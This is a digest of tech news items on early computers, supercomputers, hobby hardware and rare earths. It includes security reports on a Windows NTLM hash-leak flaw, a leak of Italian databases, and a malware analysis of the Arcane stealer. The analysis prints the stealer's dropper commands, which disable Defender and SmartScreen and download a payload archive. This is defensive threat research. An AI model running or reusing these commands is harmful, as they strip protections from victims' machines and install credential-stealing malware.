So, what made this hack so special? The Manchester Baby, though a relatively simple prototype, was the first fully electronic computer to successfully run a program from memory. Built by a team with little formal experience in computing, the Baby featured a unique cathode-ray tube (CRT) as its memory store – a bold step towards modern computing. It didn’t just crunch numbers; it laid the foundation for all future machines that would use memory to store both data and instructions. Running a test to find the highest factor of a number, the Baby performed 3.5 million operations over 52 minutes. Impressive for its time.
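For a sense of what that first program was doing, here’s a sketch of the highest-factor search in Python. The Baby had no divide instruction, so divisibility was tested by repeated subtraction; using 2^18 as the test value follows the commonly cited account of the 1948 run:

```python
def highest_proper_factor(n):
    """Find the largest proper factor of n, testing candidates from n-1 downward.

    Divisibility is checked by repeated subtraction, mimicking the Baby's
    division-free approach rather than using the modulo operator.
    """
    d = n - 1
    while d > 1:
        remainder = n
        while remainder >= d:   # "divide" by subtracting until we can't
            remainder -= d
        if remainder == 0:      # d divides n exactly: it's the highest factor
            return d
        d -= 1
    return 1


print(highest_proper_factor(262144))  # 2^18, as in the 1948 run → 131072
```

Millions of subtractions over tens of minutes on the real hardware; a blink of an eye today, which is rather the point.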
Despite criticisms that it was just a toy computer, the Baby’s significance shines through. It was more than just a prototype; it was proof of concept for the von Neumann architecture, showing us that computers could be more than complex calculators. While debates continue about whether it or the ENIAC should be considered the first true stored-program computer, the Baby’s role in the evolution of computing can’t be overlooked.
youtube.com/embed/cozcXiSSkwE?…
This M5Stack Game Is Surprisingly Addictive
For those of us lucky enough to have been at Hackaday Europe in Berlin, there was a feast of hacks at our disposal. Among them was [Vladimir Divic]’s gradients game, software for an M5Stack module which was definitely a lot of fun to play. The idea of the game is simple enough, a procedurally generated contour map is displayed on the screen, and the player must navigate a red ball around and collect as many green ones as possible. It’s navigated using the M5Stack’s accelerometer, which is what makes for the engaging gameplay. In particular it takes a moment to discover that the ball can be given momentum, making it something more than a simple case of ball-rolling.
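The momentum mechanic boils down to integrating tilt as acceleration rather than mapping it directly to position. Here’s a minimal sketch of that idea — the constants and function names are illustrative assumptions, not taken from [Vladimir]’s actual code:

```python
def step(pos, vel, tilt, dt=0.02, accel_scale=9.8, friction=0.98):
    """One physics tick: tilt accelerates the ball, velocity carries momentum."""
    vel = (vel + tilt * accel_scale * dt) * friction  # integrate acceleration, apply drag
    pos = pos + vel * dt                              # integrate velocity
    return pos, vel


# The ball keeps rolling after the device returns to level, thanks to stored momentum:
pos, vel = 0.0, 0.0
for _ in range(50):
    pos, vel = step(pos, vel, tilt=0.5)   # tilted: ball accelerates
for _ in range(50):
    pos, vel = step(pos, vel, tilt=0.0)   # level again: ball coasts, slowly losing speed
print(pos > 0 and vel > 0)  # → True
```

Mapping tilt straight to position would feel like a cursor; integrating it twice, with a little friction, is what gives the ball the coasting feel described above.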
Underneath the hood it’s an Arduino .ino file for the M5Stack’s ESP32, and thus shouldn’t present a particular challenge to most readers. Meanwhile the M5Stack, with its versatile range of peripherals, has made it onto these pages several times over the years, not least as a LoRa gateway.
FLOSS Weekly Episode 825: Open Source CI With Semaphore
This week, Jonathan Bennett and Ben Meadors talk to Darko Fabijan about Semaphore, the newly Open Sourced Continuous Integration solution! Why go Open, and how has it gone so far? Watch to find out!
- Semaphore Uncut Podcast: semaphore.io/podcast
- Discord: discord.gg/FBuUrV24NH
- youtube.com/c/SemaphoreCI
- Semaphore blog: semaphoreci.com/blog
- Semaphore on X: x.com/semaphoreci
youtube.com/embed/0Ts8sbV6K7A?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/03/19/floss-…
From the Ashes: Coal Ash May Offer Rich Source of Rare Earth Elements
For most of history, the world got along fine without the rare earth elements. We knew they existed, we knew they weren’t really all that rare, and we really didn’t have much use for them — until we discovered just how useful they are and made ourselves absolutely dependent on them, to the point where not having them would literally grind the world to a halt.
This dependency has spurred a search for caches of rare earth elements in the strangest of places, from muddy sediments on the sea floor to asteroids. But there’s one potential source that’s much closer to home: coal ash waste. According to a study from the University of Texas at Austin, the 5 gigatonnes of coal ash produced in the United States between 1950 and 2021 might contain as much as $8.4 billion worth of REEYSc — that’s the 16 lanthanide rare earth elements plus yttrium and scandium, transition metals that aren’t strictly rare earths but are geologically associated with them and useful in many of the same ways.
The study finds that about 70% of this coal ash largesse could still be accessible in the landfills and ponds in which it was dumped after being used for electrical generation or other industrial processes; the remainder is locked away in materials like asphalt and concrete, where it was used as a filler. The concentration of REEYSc in ash waste depends on where the coal was mined and ranges from 264 mg/kg for Powder River coal to 431 mg/kg for coal from the Appalachian Basin. Oddly, they find that recovery rates are inversely proportional to the richness of the ash.
The study doesn’t discuss any specific methods for recovery of REEYSc from coal ash at the industrial scale, but it does reference an earlier paper that mentions possible methods we’ve seen before in our Mining and Refining series, including physical beneficiation, which separates the desired minerals from the waste material using properties such as shape, size, or density, and hydrometallurgical methods such as acid leaching or ion exchange. The paper also doesn’t mention how these elements accumulated in the coal ash in the first place, although we assume that Carboniferous-period plants bioaccumulated the minerals before they died and started turning into coal.
Of course, this is just preliminary research, and no attempt has yet been made to commercialize rare earth extraction from coal ash. There are probably serious technical and regulatory hurdles, not least of which would be valid concerns about the environmental impact of disturbing long-ignored ash piles. On the other hand, the study mentions “mine-mouth” power plants, where mines and generating plants were colocated, as possibly the ideal places to exploit, since ash was used to backfill the mine works right on the same site.
Critical Flaw in Windows File Explorer Steals Passwords with No User Interaction
This is a serious bug fixed by Microsoft in the March Patch Tuesday, for which a proof-of-concept (PoC) exploit has been published demonstrating how the security flaw can be abused.
The vulnerability, tracked as CVE-2025-24071, resides in Windows File Explorer and allows attackers to steal NTLM-hashed passwords without any user interaction beyond simply extracting a compressed file.
The flaw allows sensitive information to be exposed to unauthorized actors, enabling network spoofing attacks. A security researcher with the handle 0x6rss published a proof-of-concept exploit on GitHub on March 16, 2025. The PoC includes a Python script that generates the malicious .library-ms file and can be run with a simple command: python poc.py
Let’s look at how this serious security bug works
The vulnerability, dubbed “NTLM Hash Leak via RAR/ZIP Extraction”, exploits Windows Explorer’s automatic file-processing mechanism. When a specially crafted .library-ms file containing a malicious SMB path is extracted from a compressed archive, Windows Explorer automatically parses its contents to generate previews and indexing metadata.
This automatic processing happens even if the user never explicitly opens the extracted file. The XML-based .library-ms file format is trusted by Windows Explorer. It defines library locations and includes a tag pointing to an attacker-controlled SMB server, says security researcher “0x6rss”.
During extraction, Windows Explorer automatically attempts to resolve the embedded SMB path (for example, \\192.168.1.116\shared) to gather metadata. This action triggers an NTLM authentication handshake from the victim’s system to the attacker’s server, leaking the victim’s NTLMv2 hash without any user interaction.
Using Procmon, we can clearly observe that immediately after the .library-ms file is extracted, the following operations are performed automatically by Explorer.exe and by indexing services such as SearchProtocolHost.exe:
- CreateFile: the file is automatically opened by Explorer.
- ReadFile: the file’s contents are read to extract metadata.
- QueryBasicInformationFile: metadata queries are executed.
- CloseFile: the file is closed after processing.
In addition, SearchProtocolHost.exe is invoked as part of the Windows file-indexing service. After Explorer.exe finishes its initial processing, the indexing service reopens and reads the file to index its contents. This further confirms the automated handling of files upon extraction:
- CreateFile, ReadFile, QueryBasicInformationFile, CloseFile: performed by SearchProtocolHost.exe to add the file’s contents to the search index.
These actions conclusively demonstrate that Windows processes files automatically immediately after extraction, without any explicit user interaction.
Both Explorer.exe and SearchProtocolHost.exe automatically read and process the XML content of the .library-ms file, initiating a connection attempt to the SMB path embedded within it.
Exploitation of the Vulnerability in Underground Markets
This vulnerability is being actively exploited by attackers and was potentially put up for sale on the xss.is forum by the threat actor known as “Krypt0n”. This threat actor is also the developer of the malware known as “EncryptHub Stealer”.
The article Falla critica in Esplora file di Windows ruba le password senza interazione dell’utente originally appeared on il blog della sicurezza informatica.
Reviving a Maplin 4600 DIY Synthesizer From the 1970s
A piece of musical history is the Maplin 4600, a DIY electronic music synthesizer from the 1970s. The design was published in an Australian electronics magazine and sold as a DIY kit, and [LOOK MUM NO COMPUTER] got his hands on an original Maplin 4600 that he refurbishes and puts through its paces.
Inserting conductive pegs is how the operator connects different inputs and outputs.
The Maplin 4600 is a (mostly) analog device with a slightly intimidating-looking layout. It features multiple oscillators, mixers, envelope generators, filters, and a complex-looking patch bay on the right hand side that is reminiscent of a breadboard. By inserting conductive pins, one can make connections between various inputs and outputs.
Internally, the different features and circuits are mostly unconnected from one another by default, so the patch board is how the instrument is “programmed”, and the connections made can be quite complex. The 4600 is one of a few synthesizer designs by [Trevor Marshall], who has some additional details about it on his website.
The video (embedded below) is a complete walk-through of the unit, including its history, quirks, and design features. If you’d like to skip directly to a hands-on demonstrating how it works, that begins around the 10:15 mark.
Synthesizers have a rich DIY history and it’s fascinating to see an in-depth look at this one. And hey, if you like your synths complex and intimidating, do yourself a favor and check out the Starship One.
youtube.com/embed/S-tnRJZBEUk?…
Italy Hit Hard! 35 Italian Databases Exposed in the Underground, Including Giustizia.it
A recent post on the well-known underground forum BreachForums revealed the publication of a package containing 35 Italian databases, exposing sensitive information about users and companies. The user “Tanaka”, a moderator of the platform, shared a list of archives containing data in SQL and CSV formats, suggesting the possible compromise of various organizations, including private companies and even institutional entities.
Disclaimer: This report includes screenshots and/or text taken from publicly accessible sources. The information provided is intended exclusively for threat-intelligence purposes and to raise awareness of cybersecurity risks. Red Hot Cyber condemns any unauthorized access, improper dissemination, or unlawful use of such data. At present, it is not possible to independently verify the authenticity of the reported information, as the organizations involved have not yet issued an official statement on their websites. Consequently, this article should be considered exclusively for informational and intelligence purposes.
Institutional sites among the victims
One of the most alarming elements of this data leak is the presence on the list of the site “giustizia.it”, the institutional portal of the Italian justice administration. If confirmed, this breach could have serious implications for the security of judicial data and the people involved.
In addition, the list includes several companies operating in various sectors, including e-commerce, real estate, and technology. Some files refer to databases containing hundreds of thousands of users, with information that could include login credentials, personal data, and other sensitive information.
The importance of targeted analysis
It is highly likely that these databases are the result of old breaches, repackaged and resold on the underground market as credential “collections”. This phenomenon is common on the dark web, where malicious actors combine data leaked over time to create new “combo lists” usable for targeted attacks.
Even if some credentials may appear outdated, caution is essential: many of them remain valid or are reused by users across multiple services. The circulation of these collections can fuel a new wave of phishing and credential-stuffing attacks, increasing the risk for companies and individuals alike.
The companies and entities named in the post should take immediate steps to verify the origin of these databases and determine whether they are really the result of a direct breach or whether they instead stem from an indirect compromise of third-party suppliers or connected services.
Even if they have no evidence of a previous intrusion, they should still conduct a thorough investigation to rule out the possibility of an as-yet-unidentified data breach. Continuous monitoring and the adoption of risk-mitigation strategies are essential to protect user data and preserve their reputation.
An increasingly active market for stolen data
BreachForums has established itself as one of the main hubs for selling and sharing compromised databases. After the shutdown of RaidForums, a similar platform, BreachForums quickly became the reference point for cybercriminals interested in trading sensitive data.
This latest exposure of Italian data underscores once again the importance of adequate security measures, timely system updates, and ongoing cybersecurity training to prevent future compromises.
What should you do if you are affected? The companies and entities on the list should:
- Verify the legitimacy of the alleged breach.
- Conduct a security audit to identify any flaws in their systems.
- Force a credential reset for the affected users.
- Monitor the dark web to intercept any attempts to sell or abuse the exposed data.
In a context where data leaks are increasingly frequent, prevention and timely response remain the best defense strategies.
The article Italia col Botto! Esposti 35 database italiani nell’underground. tra questi anche Giustizia.it originally appeared on il blog della sicurezza informatica.
So What is a Supercomputer Anyway?
Over the decades, many designations have been coined to classify computer systems, usually as they found use in new fields or as technological improvements caused significant shifts. While the very first electronic computers were very limited and often not programmable, they would soon morph into something that we’d recognize today as a computer, starting with World War 2’s Colossus and ENIAC, which saw use in cryptanalysis and military weapons programs, respectively.
The first commercial digital electronic computer wouldn’t appear until 1951, however, in the form of the Ferranti Mark 1. These 4.5 ton systems mostly found their way to universities and kin, where they’d find welcome use in engineering, architecture and scientific calculations. This became the focus of new computer systems, effectively the equivalent of a scientific calculator. Until the invention of the transistor, the idea of a computer being anything but a hulking, room-sized monstrosity was preposterous.
A few decades later, more computing power could be crammed into less space than ever before, including ever-higher-density storage. Computers were even found in toys, and amidst a whirlwind of mini-, micro-, super-, home-, minisuper- and mainframe computer systems, one could be excused for asking the question: what even is a supercomputer?
Today’s Supercomputers
ORNL’s Summit supercomputer, fastest until 2020 (Credit: ORNL)
Perhaps a fair way to classify supercomputers is that the ‘supercomputer’ aspect is a highly time-limited property. During the 1940s, Colossus and ENIAC were without question the supercomputers of their era, while 1976’s Cray-1 wiped the floor with everything that came before, yet all of these are archaic curiosities next to today’s top two supercomputers. Both the El Capitan and Frontier supercomputers are exascale machines (1+ exaFLOPS in double-precision IEEE 754 calculations), based around commodity x86_64 CPUs in a massively parallel configuration.
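To put “exascale” in perspective, a quick back-of-the-envelope comparison helps. The 1 exaFLOPS figure comes from the definition above; the ~100 GFLOPS desktop figure below is purely an illustrative assumption:

```python
# Rough scale comparison: exascale vs. an ordinary desktop CPU.
# 1 exaFLOPS = 10**18 double-precision operations per second.
# The desktop figure is an assumed, illustrative value only.
EXAFLOPS = 10**18
desktop_flops = 100e9  # assumed ~100 GFLOPS desktop CPU

seconds_per_year = 365 * 24 * 3600
# How many years would the desktop need to match ONE second of exascale work?
desktop_years_per_exa_second = EXAFLOPS / desktop_flops / seconds_per_year

print(f"{desktop_years_per_exa_second:.2f} desktop-years per exascale-second")
```

In other words, under these assumptions a single second of exascale computation is several months of desktop crunching.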
Taking up 700 m2 of floor space at the Lawrence Livermore National Laboratory (LLNL) and drawing 30 MW of power, El Capitan’s 43,808 AMD EPYC CPUs are paired with the same number of AMD Instinct MI300A accelerators, each containing 24 Zen 4 cores plus CDNA3 GPU and 128 GB of HBM3 RAM. Unlike the monolithic ENIAC, El Capitan’s 11,136 nodes, containing four MI300As each, rely on a number of high-speed interconnects to distribute computing work across all cores.
At LLNL, El Capitan is used for effectively the same top secret government things as ENIAC was, while Frontier at Oak Ridge National Laboratory (ORNL) was the fastest supercomputer before El Capitan came online about three years later. Although currently LLNL and ORNL have the fastest supercomputers, there are many more of these systems in use around the world, even for innocent scientific research.
Looking at the current list of supercomputers, such as today’s Top 9, it’s clear that not only can supercomputers perform a lot more operations per second, they are also invariably massively parallel computing clusters. This wasn’t a change that came easily, as parallel computing brings a whole stack of complications and problems.
The Parallel Computing Shift
ILLIAC IV massively parallel computer’s Control Unit (CU). (Credit: Steve Jurvetson, Wikimedia)
The first massively parallel computer was the ILLIAC IV, conceptualized by Daniel Slotnick in 1952 and first successfully put into operation in 1975 when it was connected to ARPANET. Although only one quadrant was fully constructed, it produced 50 MFLOPS compared to the Cray-1’s 160 MFLOPS a year later. Despite the immense construction costs and spotty operational history, it provided a most useful testbed for developing parallel computation methods and algorithms until the system was decommissioned in 1981.
There was a lot of pushback against the idea of massively parallel computation, however, with Seymour Cray famously comparing the use of many parallel vector processors instead of a single large one to ‘plowing a field with 1024 chickens instead of two oxen’.
Ultimately there is only so far you can scale a singular vector processor, of course, while parallel computing promised much better scaling, as well as the use of commodity hardware. A good example of this is a so-called Beowulf cluster, named after the original 1994 parallel computer built by Thomas Sterling and Donald Becker at NASA. Such a cluster can use plain desktop computers, wired together using, for example, Ethernet, with open source libraries like Open MPI enabling massively parallel computing without a lot of effort.
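On a real Beowulf cluster the message passing would go through something like Open MPI across the network; as a self-contained, single-machine stand-in, the same scatter-compute-gather pattern can be sketched with Python’s standard library (threads stand in for cluster nodes here purely to keep the sketch runnable; the workload is a made-up example):

```python
from concurrent.futures import ThreadPoolExecutor

def partial_sum(chunk):
    # the work each "node" performs independently on its slice of the data
    return sum(x * x for x in chunk)

def parallel_sum_of_squares(data, workers=4):
    # scatter: deal the data out round-robin, one chunk per worker
    chunks = [data[i::workers] for i in range(workers)]
    # compute: each worker processes its chunk concurrently
    with ThreadPoolExecutor(max_workers=workers) as pool:
        partials = list(pool.map(partial_sum, chunks))
    # gather/reduce: combine the partial results into the final answer
    return sum(partials)

print(parallel_sum_of_squares(list(range(1000))))
```

Swap the thread pool for MPI ranks and the chunks for messages over Ethernet, and this is conceptually what a Beowulf cluster does at much larger scale.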
Not only does this approach enable the assembly of a ‘supercomputer’ from cheap-ish, off-the-shelf components, it’s also effectively the approach used for LLNL’s El Capitan, albeit with far-from-cheap compute and interconnect hardware. Even so, it remains cheaper than trying to build a monolithic vector processor with the same raw processing power, even after taking a cluster’s messaging overhead into account.
Mini And Maxi
David Lovett of Usagi Electric fame sitting among his FPS minisupercomputer hardware. (Credit: David Lovett, YouTube)
One way to look at supercomputers is that what matters is not the scale, but what you do with it. Much like how governments, large businesses and universities would end up with ‘Big Iron’ in the form of mainframes and supercomputers, there was a big market for minicomputers too. Here ‘mini’ meant something like a PDP-11 that’d comfortably fit in the corner of an average room at an office or university.
The high-end versions of minicomputers were called ‘superminicomputers’, which are not to be confused with minisupercomputers, another class entirely. During the 1980s there was a brief surge in this latter class of supercomputers, designed to bring solid vector computing and similar supercomputer feats down to a size and price tag that might entice departments and other customers who’d otherwise not even begin to consider such an investment.
The manufacturers of these ‘budget-sized supercomputers’ were generally not the typical big computer manufacturers, but instead smaller companies and start-ups like Floating Point Systems (later acquired by Cray) who sold array processors and similar parallel, vector computing hardware.
Recently [David Lovett] (AKA Mr. Usagi Electric) embarked on a quest to recover and reverse-engineer as much FPS hardware as possible, with one of the goals being to build a full minisupercomputer system like those companies and universities might have used in the 1980s. This would involve attaching such an array processor to a PDP-11/44 system.
Speed Versus Reliability
Amidst all of these definitions, the distinction between a mainframe and a supercomputer is at least much easier and more straightforward. A mainframe is a computer system that’s designed for bulk data processing with as much built-in reliability and redundancy as the price tag allows for. A modern example is IBM’s Z-series of mainframes, with the ‘Z’ standing for ‘zero downtime’. These kinds of systems are used by financial institutions and anywhere else where downtime is counted in millions of dollars going up in (literal) flames every second.
This means hot-swappable processor modules, hot-swappable and redundant power supplies, not to mention hot spares and a strong focus on fault tolerant computing. All of these features are less relevant for a supercomputer, where raw performance is the defining factor when running days-long simulations and when other ways to detect flaws exist without requiring hardware-level redundancy.
Considering the brief lifespan of supercomputers (currently in the order of a few years) compared to mainframes (decades) and the many years that the microcomputers which we have on our desks can last, the life of a supercomputer seems like that of a bright and very brief flame, indeed.
Top image: Marlyn Wescoff and Betty Jean Jennings configuring plugboards on the ENIAC computer (Source: US National Archives)
Make Fancy Resin Printer 3D Models FDM-Friendly
Do you like high-detail 3D models intended for resin printing, but wish you could more easily print them on a filament-based FDM printer? Good news, because [Jacob] of Painted4Combat shared a tool he created to make 3D models meant for resin printers — the kind popular with tabletop gamers — easier to port to FDM. It comes in the form of a Blender add-on called Resin2FDM. Intrigued, but wary of your own lack of experience with Blender? No problem, because he also made a video that walks you through the whole thing step-by-step.
Resin2FDM separates the model from the support structure, then converts the support structure to be FDM-friendly.
3D models intended for resin printing aren’t actually any different, format-wise, from models intended for FDM printers. The differences all come down to the features of the model and how well the printer can execute them. Resin printing is very different from FDM, so printing a model on the “wrong” type of printer will often have disappointing results. Let’s look at why that is, to better understand what makes [Jacob]’s tool so useful.
Rafts and a forest of thin tree-like supports are common in resin printing. In the tabletop gaming scene, many models come pre-supported for convenience. A fair bit of work goes into optimizing the orientation of everything for best printed results, but the benefits don’t carry directly over to FDM.
For one thing, supports for resin prints are usually too small for an FDM printer to properly execute — they tend to be very thin and very tall, which is probably the least favorable shape for FDM printing. In addition, contact points where each support tapers down to a small point that connects to the model are especially troublesome; FDM slicer software will often simply consider those features too small to bother trying to print. Supports that work on a resin printer tend to be too small or too weak to be effective on FDM, even with a 0.2 mm nozzle.
To solve this, [Jacob]’s tool allows one to separate the model itself from the support structure. Once that is done, the tool further allows one to tweak the nest of supports, thickening them up just enough to successfully print on an FDM printer, while leaving the main model unchanged. The result is a support structure that prints well via FDM, allowing the model itself to come out nicely, with a minimum of alterations to the original.
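This isn’t [Jacob]’s actual algorithm, but the core geometric test behind support thickening is easy to sketch: an FDM slicer can only print a strut that spans at least one or two extrusion widths, so each support must be scaled up until it clears that threshold. All names and numbers below are illustrative assumptions:

```python
def fdm_scale_factor(strut_diameter_mm, nozzle_mm=0.4, min_walls=2):
    """Return the factor a resin-style support strut must be thickened by
    before an FDM slicer will reliably print it (1.0 = already thick enough).
    min_walls: how many extrusion widths the strut should span."""
    min_printable = nozzle_mm * min_walls
    if strut_diameter_mm >= min_printable:
        return 1.0
    return min_printable / strut_diameter_mm

# A thin resin support tip of 0.3 mm needs to grow for a 0.4 mm nozzle,
# while a chunky 1.0 mm strut can be left alone:
print(fdm_scale_factor(0.3))
print(fdm_scale_factor(1.0))
```

Applying a factor like this to the support geometry only, while leaving the model mesh untouched, is the essence of what the add-on automates.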
Resin2FDM is available in two versions, the Lite version is free and an advanced version with more features is available to [Jacob]’s Patreon subscribers. The video (embedded below) covers everything from installation to use, and includes some general tips for best results. Check it out if you’re interested in how [Jacob] solved this problem, and keep it in mind for the next time you run across a pre-supported model intended for resin printing that you wish you could print with FDM.
youtube.com/embed/zZp-CLhH1Ao?…
Arcane stealer: We want all your data
At the end of 2024, we discovered a new stealer distributed via YouTube videos promoting game cheats. What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. The malicious actor behind Arcane went on to release a similarly named loader, which supposedly downloads cheats and cracks, but in reality delivers malware to the victim’s device.
Distribution
The campaign in which we discovered the new stealer was already active before Arcane appeared. The original distribution method started with YouTube videos promoting game cheats. The videos were frequently accompanied by a link to an archive and a password to unlock it. Upon unpacking the archive, the user would invariably discover a start.bat batch file in the root folder and the UnRAR.exe utility in one of the subfolders.
Contents of the “natives” subfolder
The contents of the batch file were obfuscated. Its only purpose was to download another password-protected archive via PowerShell and unpack it with UnRAR.exe, with the password embedded in the batch file as an argument.
Contents of the obfuscated start.bat file
Following that, start.bat would use PowerShell to launch the executable files from the archive. While doing so, it added every drive’s root folder to Microsoft Defender’s scan exclusions via Add-MpPreference. It then reset the EnableWebContentEvaluation and SmartScreenEnabled registry keys via the system console utility reg.exe to disable SmartScreen altogether.
powershell -Command "Get-PSDrive -PSProvider FileSystem | ForEach-Object {Add-MpPreference -ExclusionPath $_.Root}"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
powershell -Command "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/<redacted>')"
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/<redacted>/black.rar?rlkey=<redacted>&st=<redacted>&dl=1', 'C:\Users\<redacted>\AppData\Local\Temp\black.rar')"
Key commands run by start.bat
The archive would always contain two executables: a miner and a stealer.
Contents of the downloaded archive
The stealer was a Phemedrone Trojan variant, rebranded by the attackers as “VGS”. They used this name in the logo that, when the stealer generates activity reports, is written to the beginning of the file along with the report’s creation date and time.
Arcane replaces VGS
At the end of 2024, we discovered a new Arcane stealer distributed as part of the same campaign. It is worth noting that a stealer with a similar name has been encountered before: a Trojan named “Arcane Stealer V” was offered on the dark web in 2019, but it shares little with our find. The new stealer takes its name from the ASCII art in the code.
Arcane succeeded VGS in November. Although much of it was borrowed from other stealers, we could not attribute it to any of the known families.
Arcane gets regular updates, so its code and capabilities change from version to version. We will describe the common functionality present in various modifications and builds. In addition to logins, passwords, credit card data, tokens and other credentials from various Chromium and Gecko-based browsers, Arcane steals configuration files, settings and account information from the following applications:
- VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
- Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
- Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
- Email clients: Outlook
- Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
- Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi
In addition, the stealer collects all kinds of system information, such as the OS version and installation date, digital key for system activation and license verification, username and computer name, location, information about the CPU, memory, graphics card, drives, network and USB devices, and installed antimalware and browsers. Arcane also takes screenshots of the infected device, obtains lists of running processes and Wi-Fi networks saved in the OS, and retrieves the passwords for those networks.
Arcane’s functionality for stealing data from browsers warrants special attention. Most browsers generate unique keys for encrypting sensitive data they store, such as logins, passwords, cookies, etc. Arcane uses the Data Protection API (DPAPI) to obtain these keys, which is typical of stealers. But Arcane also contains an executable file of the Xaitax utility, which it uses to crack browser keys. To do this, the utility is dropped to disk and launched covertly, and the stealer obtains all the keys it needs from its console output.
The stealer implements an additional method for extracting cookies from Chromium-based browsers through a debug port. The Trojan secretly launches a copy of the browser with the “remote-debugging-port” argument, then connects to the debug port, issues commands to visit several sites, and requests their cookies. The list of resources it visits is provided below.
- gmail.com
- drive.google.com
- photos.google.com
- mail.ru
- rambler.ru
- steamcommunity.com
- youtube.com
- avito.ru
- ozon.ru
- twitter.com
- roblox.com
- passport.yandex.ru
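For defenders, the notable point is that this technique uses nothing beyond the browser’s documented DevTools protocol: a client on the debug port exchanges JSON messages over a WebSocket. The messages a tool would need to issue look like the sketch below (payload construction only; no browser is launched or contacted, and the URLs are placeholders):

```python
import json
from itertools import count

_msg_id = count(1)  # DevTools requires a unique integer id per message

def devtools_command(method, params=None):
    """Build one Chrome DevTools Protocol message as a JSON string.
    Real use would send this over the WebSocket exposed on the debug port."""
    msg = {"id": next(_msg_id), "method": method}
    if params:
        msg["params"] = params
    return json.dumps(msg)

# Navigate a tab to a site, then request that site's cookies:
nav = devtools_command("Page.navigate", {"url": "https://example.com"})
cookies = devtools_command("Network.getCookies",
                           {"urls": ["https://example.com"]})
print(nav)
print(cookies)
```

The lesson for hardening: a browser started with a remote debugging port will hand its cookies to any local process that can speak this protocol, which is why security tooling flags unexpected `--remote-debugging-port` launches.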
ArcanaLoader
Within a few months of discovering the stealer, we noticed a new distribution pattern. Rather than promoting cheats, the threat actors shifted to advertising ArcanaLoader on their YouTube channels. This is a loader with a graphical user interface for downloading and running the most popular cracks, cheats and other similar software. More often than not, the links in the videos led to an executable file that downloaded an archive with ArcanaLoader.
See translation
Читы | Cheats |
Настройки | Settings |
Клиенты с читами | Clients with cheats |
Все версии | All versions |
Введите название чита | Enter cheat name |
Версия: 1.16.5 | Version: 1.16.5 |
Запустить | Start |
Версия: Все Версии | Version: All versions |
The loader itself included a link to the developers’ Discord server, which featured channels for news, support and links to download new versions.
See translation
You have been invited to Arcana Loader
548 online
3,156 users
Accept invitation
At the same time, one of the Discord channels posted an ad, looking for bloggers to promote ArcanaLoader.
Looking for bloggers to spread the loader
See translation
ArcanaLoader BOT
Form:
1. Total subscribers
2. Average views per week
3. Link to ArcanaLoader video
4. Screenshot proof of channel ownership
YOUTUBE
Criteria:
1. 600* subscribers
2. 1,500+ views
3. Links to 2 Arcana Loader videos
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
3. Add cheat to loader without delay
4. Access to @everyone in the #MEDIA chat
5. Possible compensation in rubles for high traffic
MEDIA
Criteria:
1. 50+ subscribers
2. 150+ views
3. Link to 1 ArcanaLoader video
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
Sadly, the main ArcanaLoader executable contained the aforementioned Arcane stealer.
Victims
All conversations on the Discord server are in Russian, the language used in the news channels and YouTube videos. Apparently, the attackers target a Russian-speaking audience. Our telemetry confirms this assumption: most of the attacked users were in Russia, Belarus and Kazakhstan.
Takeaways
Attackers have been using cheats and cracks as a popular trick to spread all sorts of malware for years, and they’ll probably keep doing so. What’s interesting about this particular campaign is that it illustrates how flexible cybercriminals are, always updating their tools and the methods of distributing them. Besides, the Arcane stealer itself is fascinating because of all the different data it collects and the tricks it uses to extract the information the attackers want. To stay safe from these threats, we suggest being wary of ads for shady software like cheats and cracks, avoiding links from unfamiliar bloggers, and using strong security software to detect and disarm rapidly evolving malware.
“Glasses” That Transcribe Text To Audio
Glasses for the blind might sound like an odd idea, given the traditional purpose of glasses and the issue of vision impairment. However, eighth-grade student [Akhil Nagori] built these glasses with an alternate purpose in mind. They’re not really for seeing. Instead, they’re outfitted with hardware to capture text and read it aloud.
Yes, we’re talking about real-time text-to-audio transcription, built into a head-worn format. The hardware is pretty straightforward: a Raspberry Pi Zero 2W runs off a battery and is outfitted with the usual first-party camera. The camera is mounted on a set of eyeglass frames so that it points at whatever the wearer might be “looking” at. At the push of a button, the camera captures an image, and then passes it to an API which does the optical character recognition. The text can then be passed to a speech synthesizer so it can be read aloud to the wearer.
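[Akhil]’s exact code isn’t shown here, but the overall flow is simple enough to sketch as a pipeline. In this sketch the capture, OCR and speech steps are passed in as functions so the glue logic stays self-contained and testable; on the real device they would be the Pi camera, an OCR API call and a speech synthesizer (all names here are placeholders, not the project’s actual API):

```python
def read_aloud_once(capture, recognize, speak):
    """One button press: capture -> OCR -> text-to-speech.
    capture():      returns an image (whatever the camera library provides)
    recognize(img): image -> recognized text (the OCR step)
    speak(text):    sends text to the speech synthesizer
    Returns the text that was spoken, or None if nothing legible was found."""
    image = capture()
    text = recognize(image)
    text = " ".join(text.split())  # squash OCR line breaks for smoother speech
    if not text:
        return None  # nothing legible in frame; stay silent
    speak(text)
    return text

# Wire in stand-ins to demo the flow; a real build would plug in the
# Pi camera, an OCR service, and a TTS engine here:
spoken = read_aloud_once(
    capture=lambda: "fake-image",
    recognize=lambda img: "HELLO\nWORLD",
    speak=lambda text: None,
)
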